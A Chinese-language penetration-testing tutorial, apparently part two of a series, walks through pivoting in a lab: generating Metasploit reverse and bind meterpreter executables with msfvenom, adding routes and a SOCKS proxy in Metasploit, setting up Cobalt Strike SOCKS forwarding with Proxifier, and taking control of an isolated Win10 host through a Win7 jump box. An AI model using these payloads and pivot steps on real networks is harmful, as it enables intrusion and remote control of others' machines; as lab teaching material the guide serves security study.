隧道技术和代理技术(二)

代理技术

基础知识

代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作)

连接方向:正向&反向(基础课程有讲过)

这里有个图,方便理解

网络情况:win7有 其他都没有

实现两个目的:

1.通讯后的渗透测试

2.横向移动通讯后的控制上线 CS&MSF

主要思路:由于攻击机没有办法直接连接win10靶机,所以要在win7上节点开个口子(当个跳板),去通讯win10

msf代理

需要配置路由

先测试win7是否,可以msf上线(攻击机最好是有公网ip的服务器,因为服务器出问题了,我用的是kali,后面是有功能不能实现,但是操作是正确,都有讲到)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.23.128 LPORT=1122 -f exe > 11.exe 

注意这里是x64,所以下面msfconsole的payload要配置成x64,我在实操傻了,前后不一样,大家可能不会犯一样的错误,但是还是要说一下,很浪费时间的

这里在win上执行11.exe文件

看到可以上线

看到上面第一个图,可以上到只有win7是通网,win10可以用win7通讯

所以

shell
ping 192.168.23.136

可以ping通,说明win7可以入win10

接下来设置路由

background
sessions 2
run autoroute -p #发现没有路由
run post/multi/manage/autoroute
run autoroute -p #此刻有了

这里还需要建立模块

如果不知道,可以简单查询一下,第一个就是

background
search socks

接下来建立socks模块

use auxiliary/server/socks_proxy
show options
set srvport 1122
run

接下来可以配置代理了,注意这里版本是5,下面会用到

在另一台服务器,我这里是win10虚拟机(最好是有公网ip的windows服务器),安装代理工具SocksCap64

点击代理

添加代理,这里是攻击机(我攻击机kali)的ip地址,端口1122,代理类型是socks5(上面说过版本是5),配置完点击对钩的图案,测试一下,如图就是成功了

保存后,导入浏览器

右击一个浏览器,点击在代理隧道中运行选中程序

这里访问域内的win10,一般情况是能的访问,但是我这里是虚拟机,所以无法访问

最后讲一下原理,整个过程就是,攻击机服务器通过连接类似vpn的服务器,去将win7设成节点,访问域内win10虚拟机

cs代理

不需要配置路由

先使win7上线

然后设置回连为0

cs相对于msf相对简单,直接右击代理转发,socks代理

然后就用它给的端口

接下来本地使用工具proxifier

设置代理

地址就是cs服务器的位置,端口就是刚刚cs开的端口,注意前面开的是socks4

点检测先停止检测,在点击测试设置

现在就是正常的了

这里应用程序填写,就是走socks的应用,目标主机写win10ip,动作socks4

接下来就可以通讯了

接下来就是让win10上线

思路:因为win10只有入规则,不出网,只能使用正向连接,就是win10先将信息发送到本地的端口,在通过win7连接win10

的本地端口,先控制win7在通过win7连接win10

cs上线

先在cs上配置监听器

使用stageless模式生成exe文件

直接在win10里运行是不能上线的(这里只是怎么上线,没有讲怎么横向移动)

然后cs进入win7的会话

输入

connect 192.168.23.136 6666 #正向连接的端口

成功上线

如果通过win10,连接其他内网主机就是重复上面的操作

msf上线

注意这里是正向连接,所以是bind,ip是自己的0.0.0.0

msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=1111 -f exe > 111.exe 

然后设置监听服务

和反向一样就是payload不一樣了

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set lhost 192.168.23.136 #win10的ip
set lport 1111
run

win10上运行就上线了